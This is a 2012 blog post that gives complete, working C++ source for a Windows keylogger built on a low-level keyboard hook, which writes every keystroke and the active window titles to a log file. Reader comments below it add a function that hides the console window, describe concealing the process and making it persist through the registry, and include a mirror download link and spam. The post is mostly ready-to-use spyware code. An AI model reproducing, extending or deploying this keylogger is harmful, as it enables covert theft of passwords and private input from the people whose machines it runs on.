January 04, 2012

[C++] Keylogger source using SetWindowsHookEx

Author: tec at 1/04/2012 07:34:00 pm Labels: , , ,
Compiled and tested on MS VC++ 2010 and WinXP.

Features
  • Fully commented source
  • Captures capital and small alphabets, numbers, symbols
  • Logs all special keys like tabs, alt, shift
  • Uses low level keyboard hook to log keys to a text file
  • Very optimized and resource friendly
  • Good for learning
To start logging, compile and execute. To stop logging press CTRL + F12
/************************************************************
* A very basic Key logger in C++
* Author: Manish
************************************************************/

// Include header files
#include 
#include 

// Initialize a keyboard HHOOK
HHOOK KeyboardHook;

// Function to write to a file
void write(const char* c)
{
 const char* fileLocation = "F:\\log.txt"; // Define the location of log file
 FILE *f = fopen(fileLocation,"a+"); // Open the log file in append mode
 if(f!=NULL)
 {
  fputs(c,f); // Write to end of the file
  fclose(f); // Close the file
 }
}

// The WIN API Message Loop
void KeepAlive()
{
    MSG message;
    while (GetMessage(&message,NULL,0,0))
    {
  TranslateMessage(&message);
  DispatchMessage(&message);
    }
}

// Unhook and exit
void Exit()
{
    UnhookWindowsHookEx(KeyboardHook);
    exit(0);
}

// Is shift key down ?
bool shift = false;
// Store window
HWND oldWindow = NULL;
// Window text
char cWindow[MAX_PATH];

// Callback function to be hooked
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    bool bControlKeyDown=0;
 // Get current state of capsLock
 bool caps = GetKeyState(VK_CAPITAL) < 0;
    KBDLLHOOKSTRUCT *p = (KBDLLHOOKSTRUCT *) lParam;
 if(nCode == HC_ACTION){
  // Determine the current state of shift key
  if(p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT){
   if(wParam == WM_KEYDOWN)
   {
    shift = true;
   }
   else
   {
    shift = false;
   }
  }
  // Check if F12 + CTRL is pressed, if yes -> exit
  bControlKeyDown = GetAsyncKeyState (VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1);
  if (p->vkCode == VK_F12 && bControlKeyDown) // If F12 and CTRL are pressed
  {
   Exit();
  }
  // Start logging keys
  if(wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) // If key has been pressed
  {
   HWND newWindow = GetForegroundWindow();
   if(oldWindow == NULL || newWindow != oldWindow){
    // Get Active window title and store it
    GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
    write("\nActive Window: ");
    write(cWindow);
    write("\n");
    oldWindow = newWindow;
   }
   // Virtual key codes reference: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx
   switch(p->vkCode) // Compare virtual keycode to hex values and log keys accordingly
   {
    //Number keys
    case 0x30: write(shift?")":"0");break;
    case 0x31: write(shift?"!":"1");break;
    case 0x32: write(shift?"@":"2");break;
    case 0x33: write(shift?"#":"3");break;
    case 0x34: write(shift?"$":"4");break;
    case 0x35: write(shift?"%":"5");break;
    case 0x36: write(shift?"^":"6");break;
    case 0x37: write(shift?"&":"7");break;
    case 0x38: write(shift?"*":"8");break;
    case 0x39: write(shift?"(":"9");break;
    // Numpad keys
    case 0x60: write("0");break;
    case 0x61: write("1");break;
    case 0x62: write("2");break;
    case 0x63: write("3");break;
    case 0x64: write("4");break;
    case 0x65: write("5");break;
    case 0x66: write("6");break;
    case 0x67: write("7");break;
    case 0x68: write("8");break;
    case 0x69: write("9");break;
    // Character keys
    case 0x41: write(caps?(shift?"a":"A"):(shift?"A":"a"));break;
    case 0x42: write(caps?(shift?"b":"B"):(shift?"B":"b"));break;
    case 0x43: write(caps?(shift?"c":"C"):(shift?"C":"c"));break;
    case 0x44: write(caps?(shift?"d":"D"):(shift?"D":"d"));break;
    case 0x45: write(caps?(shift?"e":"E"):(shift?"E":"e"));break;
    case 0x46: write(caps?(shift?"f":"F"):(shift?"F":"f"));break;
    case 0x47: write(caps?(shift?"g":"G"):(shift?"G":"g"));break;
    case 0x48: write(caps?(shift?"h":"H"):(shift?"H":"h"));break;
    case 0x49: write(caps?(shift?"i":"I"):(shift?"I":"i"));break;
    case 0x4A: write(caps?(shift?"j":"J"):(shift?"J":"j"));break;
    case 0x4B: write(caps?(shift?"k":"K"):(shift?"K":"k"));break;
    case 0x4C: write(caps?(shift?"l":"L"):(shift?"L":"l"));break;
    case 0x4D: write(caps?(shift?"m":"M"):(shift?"M":"m"));break;
    case 0x4E: write(caps?(shift?"n":"N"):(shift?"N":"n"));break;
    case 0x4F: write(caps?(shift?"o":"O"):(shift?"O":"o"));break;
    case 0x50: write(caps?(shift?"p":"P"):(shift?"P":"p"));break;
    case 0x51: write(caps?(shift?"q":"Q"):(shift?"Q":"q"));break;
    case 0x52: write(caps?(shift?"r":"R"):(shift?"R":"r"));break;
    case 0x53: write(caps?(shift?"s":"S"):(shift?"S":"s"));break;
    case 0x54: write(caps?(shift?"t":"T"):(shift?"T":"t"));break;
    case 0x55: write(caps?(shift?"u":"U"):(shift?"U":"u"));break;
    case 0x56: write(caps?(shift?"v":"V"):(shift?"V":"v"));break;
    case 0x57: write(caps?(shift?"w":"W"):(shift?"W":"w"));break;
    case 0x58: write(caps?(shift?"x":"X"):(shift?"X":"x"));break;
    case 0x59: write(caps?(shift?"y":"Y"):(shift?"Y":"y"));break;
    case 0x5A: write(caps?(shift?"z":"Z"):(shift?"Z":"z"));break;
    // Special keys
    case VK_SPACE: write(" "); break;
    case VK_RETURN: write("\n"); break;
    case VK_TAB: write("\t"); break;
    case VK_ESCAPE: write("[ESC]"); break;
    case VK_LEFT: write("[LEFT]"); break;
    case VK_RIGHT: write("[RIGHT]"); break;
    case VK_UP: write("[UP]"); break;
    case VK_DOWN: write("[DOWN]"); break;
    case VK_END: write("[END]"); break;
    case VK_HOME: write("[HOME]"); break;
    case VK_DELETE: write("[DELETE]"); break;
    case VK_BACK: write("[BACKSPACE]"); break;
    case VK_INSERT: write("[INSERT]"); break;
    case VK_LCONTROL: write("[CTRL]"); break;
    case VK_RCONTROL: write("[CTRL]"); break;
    case VK_LMENU: write("[ALT]"); break;
    case VK_RMENU: write("[ALT]"); break;
    case VK_F1: write("[F1]");break;
    case VK_F2: write("[F2]");break;
    case VK_F3: write("[F3]");break;
    case VK_F4: write("[F4]");break;
    case VK_F5: write("[F5]");break;
    case VK_F6: write("[F6]");break;
    case VK_F7: write("[F7]");break;
    case VK_F8: write("[F8]");break;
    case VK_F9: write("[F9]");break;
    case VK_F10: write("[F10]");break;
    case VK_F11: write("[F11]");break;
    case VK_F12: write("[F12]");break;
    // Shift keys
    case VK_LSHIFT: break; // Do nothing
    case VK_RSHIFT: break; // Do nothing
    // Symbol keys
    case VK_OEM_1: write(shift?":":";");break;
    case VK_OEM_2: write(shift?"?":"/");break;
    case VK_OEM_3: write(shift?"~":"`");break;
    case VK_OEM_4: write(shift?"{":"[");break;
    case VK_OEM_5: write(shift?"|":"\\");break;
    case VK_OEM_6: write(shift?"}":"]");break;
    case VK_OEM_7: write(shift?"\"":"'");break;
    case VK_OEM_PLUS: write(shift?"+":"=");break;
    case VK_OEM_COMMA: write(shift?"<":",");break;
    case VK_OEM_MINUS: write(shift?+"_":"-");break;
    case VK_OEM_PERIOD: write(shift?">":".");break;
    default: 
     DWORD dwMsg = p->scanCode << 16;
                        dwMsg += p->flags << 24;
                        char key[16];
                        GetKeyNameText(dwMsg,key,15);
      write(key);
      break;
   }
  }
 }
 // Forward the event to other hooks
    return CallNextHookEx(NULL,nCode,wParam,lParam);
}

// WinAPI main method
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
 // Write to file
 write("\n---------------------------------------------------------");
 // Hook to all available threads
    KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
 if(KeyboardHook!=NULL)
 {
  // Keep alive till F12 + CTRL key press is detected - can also register Hotkey
  KeepAlive();
 }
 // Exit the program
    return 0;
}
 

22 comments:

  1. Tim26 January 2012 at 05:24

    Wouldn't logging every time the user presses a key be inefficient?

    ReplyDelete
  2. tec26 January 2012 at 11:02

    @Tim, it's quite efficient for modern computers.

    ReplyDelete
  3. Westwoods28 January 2012 at 06:33

    Does this work for anyone here?

    ReplyDelete
  4. wow28 April 2012 at 23:02

    nice share....thanks

    ReplyDelete
  5. Anonymous17 July 2012 at 19:49

    Works great! I am going to modify and use it, thanks.

    ReplyDelete
  6. Anonymous9 August 2012 at 15:19

    where is the download link =s

    ReplyDelete
  7. Anonymous9 August 2012 at 15:22

    please email me the sourcecode..
    aloneinthedark9056@yahoo.com

    ReplyDelete
  8. Anonymous23 August 2012 at 10:16

    hey i'm new the c++.
    I just wanna learn this and debug myself.
    how can i see this in window or command prompt.
    Please tell me garrus_n@yahoo.com

    ReplyDelete
    Replies
    1. tec23 August 2012 at 20:25

      Use a compiler to compile and then execute. Refer to my other post for how to run this in MSVC++ 2010.

      Delete
  9. Anonymous23 August 2012 at 20:20

    really helped me, using visual studios.

    ReplyDelete
  10. Anonymous24 August 2012 at 17:28

    please manish send me the code..
    the link is not working..
    or place it on mediafire
    please

    ReplyDelete
    Replies
    1. tec24 August 2012 at 23:28

      Are you unable to access the pastebin link?
      Anyways, try this mirror: http://www.2shared.com/file/CQqzI6eO/keylogger_technoslabin_.html.

      Delete
    2. Unknown15 April 2016 at 15:41

      Hi Manish, sorry for looping to this conversation. I just want to ask why after a long time, certain time, sometimes a day, the application detached its focus to the log file, making it not to capture key strokes, though the application is still running. I tried to fix it but cant find a way. Tnx for your kind reply and if you dont mind, kindy reply to my Email salvador.elizaldy89@gmail.com.

      Delete
  11. Anonymous23 February 2013 at 12:41

    worth looking into...got it working

    ReplyDelete
  12. Anonymous7 April 2013 at 18:25

    Nice post. I was checking constantly this blog and I'm impressed! Very helpful info specifically the last part :) I care for such info a lot. I was seeking this particular information for a very long time. Thank you and best of luck.

    Feel free to surf to my web page Sharecash Downloader 2013

    ReplyDelete
  13. Anonymous9 April 2013 at 01:42

    Thanks for some other great post. The place else may anybody get that type of info in such an ideal manner of writing?
    I've a presentation next week, and I'm on the search for
    such information.

    Here is my page ... bypass sharecash surveys

    ReplyDelete
  14. Unknown2 March 2016 at 14:15

    Thanks man! It is very nice, works like a charm!

    Only had to add "#define _CRT_SECURE_NO_WARNINGS" at the beginning. VS 2013 compiler had problems with fopen function.

    ReplyDelete
  15. Unknown6 April 2016 at 16:51

    This comment has been removed by the author.

    ReplyDelete
  16. Unknown6 April 2016 at 16:51

    Nice one, I Modified the source code to press 4 character to stop the keylogger, its also invisible in Application Window Tab in task manager, but visible as process Tab. Its now working for me, try to add some feature someday like date and time of logging and adding the program to registry.

    ReplyDelete
    Replies
    1. Unknown27 May 2016 at 14:28

      This comment has been removed by the author.

      Delete
    2. Unknown27 May 2016 at 14:29

      HEY ,can you tell me how to change the file location from F: to C: it doesnt seem to save the text file in C: when i change the path to C drive

      Delete
  17. Anonymous16 October 2016 at 17:49

    Nice Keylogger,

    when i compiling this code, i faced 4 errors
    but i solved that immediately... so no worry

    and i added code to hide window

    void Stealth()
    {
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
    }



    to use this function you have to add this lines to top of cpp file and call this function in main method by: Stealth();



    by VSX

    ReplyDelete

Subscribe to: Post Comments (Atom)